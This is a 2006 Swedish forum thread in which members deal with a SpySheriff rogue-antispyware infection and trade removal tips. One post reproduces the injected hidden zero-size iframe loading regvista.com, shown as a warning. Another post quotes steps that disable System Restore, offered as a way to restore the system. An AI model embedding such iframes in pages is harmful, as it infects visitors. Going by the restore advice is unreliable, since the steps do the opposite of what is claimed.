R2D2 Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Jag får inte upp rutan. Citera Länk till kommentar Dela på andra sidor More sharing options...
Pico Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 FOOKIN SHITE. Jävla cp-SpySheriff är i farten, har haft duster med detta djävulens påfund ett flertal gånger innan. Citera Länk till kommentar Dela på andra sidor More sharing options...
Xemtoth Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Tur att jag fick bort den iaf min bror hjälpte mig Citera Länk till kommentar Dela på andra sidor More sharing options...
P-C Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Borta nuuu.. Citera Länk till kommentar Dela på andra sidor More sharing options...
Pico Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Tur att jag fick bort den iaf min bror hjälpte mig BAAH, hur gör man amigo? Citera Länk till kommentar Dela på andra sidor More sharing options...
Crice Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 FOOKIN SHITE. Jävla cp-SpySheriff är i farten, har haft duster med detta djävulens påfund ett flertal gånger innan. SpySheriff är det sämsta som finns, goddangit. Gör en smärre systemåterställning. Funkar för yours truly. Citera Länk till kommentar Dela på andra sidor More sharing options...
Pico Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 SpySheriff är det sämsta som finns, goddangit. Gör en smärre systemåterställning. Funkar för yours truly. Hm? Det fanns någon gång ett läge som man kom i någon sorts kalender och kunde välja ett tidigare datum att återställa till; hur lyckas jag nå det? Citera Länk till kommentar Dela på andra sidor More sharing options...
Runar Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Min dator tankade helt plöttsligt skiten när jag gick in här andra gången...men norton agerade föredömligt och tog bort den på dirr! Citera Länk till kommentar Dela på andra sidor More sharing options...
Crice Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Hm? Det fanns någon gång ett läge som man kom i någon sorts kalender och kunde välja ett tidigare datum att återställa till; hur lyckas jag nå det? Saxat från Microsofts hemsida: "1. Klicka på Start, högerklicka på Den här datorn och klicka på Egenskaper. 2. Klicka på fliken Systemåterställning. 3. Markera kryssrutan Inaktivera Systemåterställning eller Inaktivera Systemåterställning på alla enheter och klicka på OK. 4. Klicka på Ja när du tillfrågas om du vill inaktivera Systemåterställning." Works like a charm. Citera Länk till kommentar Dela på andra sidor More sharing options...
Pico Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 (redigerad) Saxat från Microsofts hemsida: "1. Klicka på Start, högerklicka på Den här datorn och klicka på Egenskaper. 2. Klicka på fliken Systemåterställning. 3. Markera kryssrutan Inaktivera Systemåterställning eller Inaktivera Systemåterställning på alla enheter och klicka på OK. 4. Klicka på Ja när du tillfrågas om du vill inaktivera Systemåterställning." Works like a charm. Det är säkrast för dig, det. Jaha, vad gör jag nu då när jag klickat på OK? Edit: Gah, skiten hänger sig åt helvete. Fan ta de jävla helvetes nollorna som plockade ihop SpySheriff. Garrgh!! Redigerad 2 maj, 2006 av Pico Citera Länk till kommentar Dela på andra sidor More sharing options...
P-C Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Nej! Pico åker tillbaks i tiden! Varna dem! Varna dem för kärnvapnen! Och jordbävningarna! VARNA ALLA! Citera Länk till kommentar Dela på andra sidor More sharing options...
Patrik Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 FOOKIN SHITE. Jävla cp-SpySheriff är i farten, har haft duster med detta djävulens påfund ett flertal gånger innan. Hm, what's that? Btw, detta kom upp mitt bland allt: Citera Länk till kommentar Dela på andra sidor More sharing options...
spajdermän Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Nej! Pico åker tillbaks i tiden! Varna dem! Varna dem för kärnvapnen! Och jordbävningarna! VARNA ALLA! ? Va va de där om då? Citera Länk till kommentar Dela på andra sidor More sharing options...
Pico Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Det börjar låta konstigt här nu. "Plipp. Plopp. Plipp." Nu är det kört. Och som grädde på moset har det här eländet tagit död på min MSN Messenger också och det går självklart INTE att installera om. Citera Länk till kommentar Dela på andra sidor More sharing options...
GiZmo Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 (redigerad) Finns fortfarande kod kvar! <iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe> Koden skapar en frame som innehåller en sida som inte kan visas, (apjuydguldid92pp5upp5c77p.affrontgl.com) Redigerad 2 maj, 2006 av GiZmo Citera Länk till kommentar Dela på andra sidor More sharing options...
Frenzy Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Det börjar låta konstigt här nu. "Plipp. Plopp. Plipp." Nu är det kört. Och som grädde på moset har det här eländet tagit död på min MSN Messenger också och det går självklart INTE att installera om. You're going down, bro. Citera Länk till kommentar Dela på andra sidor More sharing options...
epix Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Skiten infekterar ju inte om du inte startar den. Citera Länk till kommentar Dela på andra sidor More sharing options...
Warmedal Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Och här sitter man med inaktiverat antivirus.. får virussöka och se om jag fått nått. Citera Länk till kommentar Dela på andra sidor More sharing options...
Pico Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 YAY! AdAware fixar biffen! *gör en MJ* Citera Länk till kommentar Dela på andra sidor More sharing options...
spajdermän Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 YAY! AdAware fixar biffen! *gör en MJ* SKönt för dig Citera Länk till kommentar Dela på andra sidor More sharing options...
Recommended Posts